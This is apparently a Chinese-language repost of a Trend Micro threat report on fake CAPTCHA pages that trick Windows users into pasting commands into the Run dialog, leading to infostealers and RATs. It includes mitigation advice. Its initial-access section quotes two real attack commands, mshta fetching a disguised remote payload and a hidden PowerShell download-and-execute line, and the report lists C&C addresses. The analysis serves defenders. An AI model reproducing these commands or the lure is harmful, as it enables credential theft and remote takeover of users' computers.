揭秘虚假CAPTCHA攻击:多阶段载荷链部署信息窃取器与远程访问木马

本文详细分析了利用虚假CAPTCHA页面诱骗用户在Windows运行对话框中执行恶意命令的新型攻击技术,涉及多阶段载荷链、内存执行规避检测及多种恶意软件家族(如Lumma Stealer、AsyncRAT等),并提供了防护建议与趋势科技解决方案。

虚假CAPTCHA攻击通过多阶段载荷链部署信息窃取器与远程访问木马 | 趋势科技(美国)

报告摘要

趋势科技研究团队发现了一系列虚假CAPTCHA页面,诱骗用户将恶意命令粘贴到Windows运行对话框中。这些活动通过钓鱼邮件、恶意广告或SEO投毒传播嵌有混淆JavaScript的文件(如MP3、PDF)。载荷使用mshta.exe或PowerShell在内存中执行,常绕过传统基于文件的检测。

此类攻击通过Lumma Stealer、Rhadamanthys、AsyncRAT、Emmenhtal和XWorm等恶意软件实现数据外泄、凭据窃取、远程访问和加载器部署。业务风险包括终端被入侵、未授权数据访问及通过持久后门和C&C通道造成的运营中断。

受影响的是运行Windows环境且脚本执行限制较少的组织。这些活动滥用了多个合法平台,包括文件共享服务、内容与搜索平台、音乐存储库、URL重定向器和文档托管服务。攻击利用了用户对CAPTCHA界面和知名品牌的信任。

禁用运行对话框和公共文件共享平台的访问,并强化浏览器设置,可显著降低此威胁的暴露风险。请参阅下方的缓解指南以获取更多最佳实践及趋势科技解决方案的防护概述。

趋势Vision One™检测并阻止了本文讨论的IOC。趋势Vision One客户还可访问狩猎查询、威胁洞察和威胁情报报告,以获取相关背景信息和这些攻击的最新更新。

攻击链分析

初始访问

用户在使用钓鱼邮件重定向或访问受SEO投毒影响的网站时,会遇到模仿合法人工验证提示的虚假CAPTCHA页面。页面指示用户复制并粘贴命令到运行对话框(Win + R)作为“验证”过程的一部分。一旦执行,该命令会启动恶意脚本,在机器上安装各种威胁。

观察到的部分命令示例:

1
2

mshta.exe hxxps://ernier[.]shop/lyricalsync[.]mp3 # ''Ι am nοt a rοbοt: САРТСНА Verification UID: 885203
PowerShell.exe -W Hidden -command $uri = 'hxxps[://]fessoclick[.]com/clck/dub.txt'; $content = (Invoke-WebRequest -Uri $uri).Content; Invoke-Expression $content”

钓鱼邮件主题常涉及客人遗留物品、紧急安全通知等,例如:

  • Action Required - Guest’s Valuable Items Left Behind
  • Urgent Security Concern: Guest’s Unclaimed Identification Documents

嵌入URL利用合法域名(如https://xxx[.]51.ca)的重定向指向虚假CAPTCHA域名。部分案例中,钓鱼邮件附加PDF附件,打开后重定向用户至虚假CAPTCHA落地页。

执行过程

攻击者将恶意脚本嵌入MP3文件中,通过mshta执行。例如,文件lyricalsync.mp3包含多阶段编码(Base64、十六进制)的JavaScript,执行后连接远程URL下载高度混淆的PowerShell脚本(伪装为XLSX文件)。

最终解码的PowerShell脚本启动新PowerShell进程,以无配置文件和不受限制执行策略避免检测,创建WebClient对象下载文件(如https://bi.yuoie[.]shop/750413b4e6897a671bc759e04597952a0be747830189873b.xlsx),并注入代码至svchost.exe,生成合法文件OOBE-Maintenance.exe连接C&C服务器(176[.]65[.]141[.]165:8587)。

此外,还观察到使用Chromium浏览器启动临时用户配置文件,禁用GPU并开放端口8000,可能用于C&C通信。Lumma Stealer还通过DLL侧加载(goopdate.dll)执行恶意代码。

载荷归属

通过URL关系和VirusTotal遥测,确定了与以下恶意软件家族的关联:

  • Lumma Stealer:多个URL指向已知分发节点。
  • Emmenhtal:C&C基础设施和投递机制与以往活动重叠。
  • Rhadamanthys:基础设施和历史恶意软件提交存在关联。
  • AsyncRAT/XWorm:共享投递URL(185[.]7[.]214[.]108/a[.]mp4)托管多载荷。

安全实践建议

  1. 禁用运行对话框(Win + R):在需限制用户访问管理工具和脚本执行的环境中实施。
  2. 应用最小权限原则:限制用户权限,禁用不必要的脚本执行,防止未授权提权。
  3. 限制访问未批准工具和文件共享平台:维护批准软件基线,阻止公共文件共享服务。
  4. 监控异常剪贴板和进程行为:检测编码命令或可疑脚本片段,跟踪媒体播放器或浏览器生成意外可执行文件的行为。
  5. 强化浏览器配置:限制非信任域JavaScript执行,启用恶意广告网络过滤,禁用自动播放和混合内容。
  6. 启用内存保护功能:利用Windows内置OS级控件检测内存执行、反射DLL注入等规避技术。
  7. 加强用户教育:培训用户识别可疑链接和钓鱼邮件,提高安全浏览意识。
  8. 采用MDR服务:提供持续监控、主动威胁狩猎和快速响应,实时关联终端、网络流量和用户行为遥测。

趋势科技解决方案

趋势端点与网络解决方案包含行为监控、预测性机器学习(PML)和Web信誉服务(WRS),可检测行为异常、主动阻止未知威胁并防止访问恶意URL。趋势Vision One™集中化管理网络风险暴露、安全操作和分层防护,支持主动安全成果。

趋势客户可通过趋势Vision One威胁洞察获取最新威胁研究信息,使用搜索应用匹配环境中恶意指标,并利用狩猎查询进行威胁追踪。

IOC详情参见:[此处提供链接]

comments powered by Disqus
© 2020 - 2025 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次